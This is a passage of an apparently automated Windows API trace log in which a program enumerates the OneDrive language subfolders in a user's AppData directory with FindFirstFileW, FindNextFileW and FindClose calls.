0 [0100.351] FindClose (in: hFindFile=0x2cfa98 | out: hFindFile=0x2cfa98) returned 1 [0100.351] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.351] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfe58 [0100.363] FindNextFileW (in: hFindFile=0x2cfe58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.363] FindNextFileW (in: hFindFile=0x2cfe58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.363] FindNextFileW (in: hFindFile=0x2cfe58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.363] FindClose (in: hFindFile=0x2cfe58 | out: hFindFile=0x2cfe58) returned 1 [0100.367] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.367] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf8d8 [0100.370] FindNextFileW (in: hFindFile=0x2cf8d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.371] FindNextFileW (in: hFindFile=0x2cf8d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.371] FindNextFileW (in: hFindFile=0x2cf8d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.371] FindClose (in: hFindFile=0x2cf8d8 | out: hFindFile=0x2cf8d8) returned 1 [0100.371] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.371] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfb58 [0100.371] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.371] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.371] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.371] FindClose (in: hFindFile=0x2cfb58 | out: hFindFile=0x2cfb58) returned 1 [0100.371] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.371] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfd98 [0100.377] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.377] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.378] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.378] FindClose (in: hFindFile=0x2cfd98 | out: hFindFile=0x2cfd98) returned 1 [0100.378] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.378] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfe18 [0100.380] FindNextFileW (in: hFindFile=0x2cfe18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.380] FindNextFileW (in: hFindFile=0x2cfe18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.380] FindNextFileW (in: hFindFile=0x2cfe18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.380] FindClose (in: hFindFile=0x2cfe18 | out: hFindFile=0x2cfe18) returned 1 [0100.380] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.380] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfcd8 [0100.394] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.394] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.394] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.395] FindClose (in: hFindFile=0x2cfcd8 | out: hFindFile=0x2cfcd8) returned 1 [0100.395] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.395] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfcd8 [0100.395] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.395] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.395] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.395] FindClose (in: hFindFile=0x2cfcd8 | out: hFindFile=0x2cfcd8) returned 1 [0100.395] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.395] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.395] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfd18 [0100.403] FindNextFileW (in: hFindFile=0x2cfd18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.403] FindNextFileW (in: hFindFile=0x2cfd18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.403] FindNextFileW (in: hFindFile=0x2cfd18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.403] FindClose (in: hFindFile=0x2cfd18 | out: hFindFile=0x2cfd18) returned 1 [0100.404] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.404] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf9d8 [0100.406] FindNextFileW (in: hFindFile=0x2cf9d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.406] FindNextFileW (in: hFindFile=0x2cf9d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.406] FindNextFileW (in: hFindFile=0x2cf9d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.406] FindClose (in: hFindFile=0x2cf9d8 | out: hFindFile=0x2cf9d8) returned 1 [0100.406] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.406] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf918 [0100.407] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.407] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.407] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.407] FindClose (in: hFindFile=0x2cf918 | out: hFindFile=0x2cf918) returned 1 [0100.407] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.407] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfb98 [0100.408] FindNextFileW (in: hFindFile=0x2cfb98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.408] FindNextFileW (in: hFindFile=0x2cfb98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.408] FindNextFileW (in: hFindFile=0x2cfb98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.408] FindClose (in: hFindFile=0x2cfb98 | out: hFindFile=0x2cfb98) returned 1 [0100.408] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.408] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfb58 [0100.409] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.409] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.409] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.409] FindClose (in: hFindFile=0x2cfb58 | out: hFindFile=0x2cfb58) returned 1 [0100.409] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.409] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.409] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.409] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfad8 [0100.410] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.410] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.410] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.410] FindClose (in: hFindFile=0x2cfad8 | out: hFindFile=0x2cfad8) returned 1 [0100.410] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.410] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf998 [0100.411] FindNextFileW (in: hFindFile=0x2cf998, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.411] FindNextFileW (in: hFindFile=0x2cf998, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.411] FindNextFileW (in: hFindFile=0x2cf998, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.411] FindClose (in: hFindFile=0x2cf998 | out: hFindFile=0x2cf998) returned 1 [0100.411] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.411] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.411] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.411] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfa18 [0100.412] FindNextFileW (in: hFindFile=0x2cfa18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.412] FindNextFileW (in: hFindFile=0x2cfa18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.412] FindNextFileW (in: hFindFile=0x2cfa18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.412] FindClose (in: hFindFile=0x2cfa18 | out: hFindFile=0x2cfa18) returned 1 [0100.412] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.412] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfc18 [0100.413] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.413] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.413] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.413] FindClose (in: hFindFile=0x2cfc18 | out: hFindFile=0x2cfc18) returned 1 [0100.413] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.413] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.413] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfed8 [0100.414] FindNextFileW (in: hFindFile=0x2cfed8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.414] FindNextFileW (in: hFindFile=0x2cfed8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.414] FindNextFileW (in: hFindFile=0x2cfed8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.414] FindClose (in: hFindFile=0x2cfed8 | out: hFindFile=0x2cfed8) returned 1 [0100.414] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.414] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfad8 [0100.415] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.415] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.415] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.415] FindClose (in: hFindFile=0x2cfad8 | out: hFindFile=0x2cfad8) returned 1 [0100.415] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.415] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf958 [0100.416] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.416] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.416] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.416] FindClose (in: hFindFile=0x2cf958 | out: hFindFile=0x2cf958) returned 1 [0100.416] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.416] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfc18 [0100.417] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.417] FindClose (in: hFindFile=0x2cfc18 | out: hFindFile=0x2cfc18) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.417] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.418] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf958 [0100.419] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.419] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.419] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.419] FindClose (in: hFindFile=0x2cf958 | out: hFindFile=0x2cf958) returned 1 [0100.419] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.419] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf7d8 [0100.421] FindNextFileW (in: hFindFile=0x2cf7d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.421] FindNextFileW (in: hFindFile=0x2cf7d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.421] FindNextFileW (in: hFindFile=0x2cf7d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.421] FindClose (in: hFindFile=0x2cf7d8 | out: hFindFile=0x2cf7d8) returned 1 [0100.421] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.421] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfa98 [0100.422] FindNextFileW (in: hFindFile=0x2cfa98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.422] FindNextFileW (in: hFindFile=0x2cfa98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.422] FindNextFileW (in: hFindFile=0x2cfa98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.422] FindClose (in: hFindFile=0x2cfa98 | out: hFindFile=0x2cfa98) returned 1 [0100.422] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.422] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfd98 [0100.423] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.423] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.423] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.423] FindClose (in: hFindFile=0x2cfd98 | out: hFindFile=0x2cfd98) returned 1 [0100.423] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.423] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfd18 [0100.424] FindNextFileW (in: hFindFile=0x2cfd18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.424] FindNextFileW (in: hFindFile=0x2cfd18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.424] FindNextFileW (in: hFindFile=0x2cfd18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.424] FindClose (in: hFindFile=0x2cfd18 | out: hFindFile=0x2cfd18) returned 1 [0100.424] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.424] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf9d8 [0100.426] FindNextFileW (in: hFindFile=0x2cf9d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.426] FindNextFileW (in: hFindFile=0x2cf9d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.426] FindNextFileW (in: hFindFile=0x2cf9d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.426] FindClose (in: hFindFile=0x2cf9d8 | out: hFindFile=0x2cf9d8) returned 1 [0100.426] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.426] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf898 [0100.427] FindNextFileW (in: hFindFile=0x2cf898, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.427] FindNextFileW (in: hFindFile=0x2cf898, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.427] FindNextFileW (in: hFindFile=0x2cf898, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.427] FindClose (in: hFindFile=0x2cf898 | out: hFindFile=0x2cf898) returned 1 [0100.427] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.428] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf958 [0100.428] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.429] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.429] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.429] FindClose (in: hFindFile=0x2cf958 | out: hFindFile=0x2cf958) returned 1 [0100.429] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.429] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf958 [0100.430] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.430] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.430] FindNextFileW (in: hFindFile=0x2cf958, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.430] FindClose (in: hFindFile=0x2cf958 | out: hFindFile=0x2cf958) returned 1 [0100.430] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.430] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfb58 [0100.431] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.431] 